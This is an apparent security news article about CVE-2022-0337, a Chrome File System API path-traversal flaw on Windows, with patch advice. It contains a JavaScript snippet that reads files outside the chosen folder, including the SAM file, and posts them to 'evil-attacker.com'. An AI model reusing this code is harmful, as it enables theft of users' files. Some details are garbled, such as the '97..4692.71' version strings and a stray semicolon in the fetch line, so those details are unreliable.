CVE CyberSecurity Database News

CVE-2022-0337 - How a Faulty File System API in Chrome Leaked Sensitive User Information on Windows

Poster -

---

Summary:  
*CVE-2022-0337 exposed a serious security hole in Google Chrome’s File System API on Windows, allowing malicious websites to peek into sensitive files on your computer. If your Chrome version was older than 97..4692.71, you were at risk.*

Understanding CVE-2022-0337

CVE-2022-0337 is a vulnerability that affected the File System API in Google Chrome for Windows, patched in January 2022. Because of a flawed implementation, it allowed attackers to use specially crafted web pages to access files they weren’t supposed to see—without your permission.

What’s the File System API?

The File System API lets websites (with your approval) read and write files on your computer. It's meant to be safe and only give access to files and folders that the user chooses. Unfortunately, that safety net broke with CVE-2022-0337.

How Did the Vulnerability Work?

On Windows, when a website used the File System API, Chrome failed to properly isolate the files the website could access. Malicious pages could then trick Chrome into accessing or leaking content from files outside of the user-given permissions.

*Imagine opening a trusted site and granting it access to a single folder, but then a hidden attack on the page pokes around your entire system, reading files you never intended to share.*

Step-by-step Exploit Breakdown

Let’s walk through a possible exploit scenario. (Note: This is for educational and awareness purposes only.)

Victim visits malicious website.

2. Website asks for folder access via File System API. The user selects a folder (maybe their Documents).
3. Malicious JavaScript abuses the API implementation to navigate “up” and access sensitive files outside the selected folder.
4. Sensitive file contents are read and sent to the attacker’s server, all without proper user consent.

Below is a simplified code snippet showing how an attacker might have attempted this

// Ask the user for access to a folder
window.showDirectoryPicker().then(async (directoryHandle) => {
  // Try to use path traversal to access parent directories (in vulnerable Chrome versions)
  const sensitiveFiles = ['../../secret.txt', '../../../Windows/System32/config/SAM'];
  
  for (const relPath of sensitiveFiles) {
    try {
      // Attempt to get a handle to a file outside the allowed folder
      const fileHandle = await directoryHandle.getFileHandle(relPath);

      // Read the file
      const file = await fileHandle.getFile();
      const contents = await file.text();

      // Send contents to attacker
      fetch('https://evil-attacker.com/leak';, {
        method: 'POST',
        body: JSON.stringify({ path: relPath, data: contents })
      });
    } catch (err) {
      // In patched Chrome, this will throw an error
      console.log('Access denied or not found:', relPath);
    }
  }
});

> In Chrome versions before 97..4692.71, improper checks could let the getFileHandle() method reach beyond the user's selected folder.

Impact in the Real World

- Sensitive personal documents could be stolen: Attackers could target files like passwords.txt, financial records, or private images.
- Credential leaks: System files or browser data files storing credentials could potentially be accessed.
- Enterprise risk: Anyone using Chrome for work with sensitive documents faced elevated risk until patched.

Patch and Mitigation

Google fixed this issue in Chrome version 97..4692.71 by tightening checks in the File System API, making it impossible for JavaScript to escape the boundaries of the user-selected folder.

Update Chrome:  
If you haven’t already, always keep your browser updated. Go to  
chrome://settings/help  
and check for updates!

References

- Chrome Release Notes (97..4692.71)  
- CVE Details for CVE-2022-0337  
- Project Zero Issue: File System API Directory Traversal  

Conclusion

CVE-2022-0337 reminds us how everyday web features can become dangerous if not properly secured. The File System API is powerful, but must be handled with care. Always update Chrome to stay safe from such threats. And remember—never grant file or folder access to websites you don’t fully trust.


*Stay safe, stay updated, and alert your friends if they’re not running the latest version of their browser!*

Timeline

Published on: 01/02/2023 23:15:00 UTC
Last modified on: 01/09/2023 19:17:00 UTC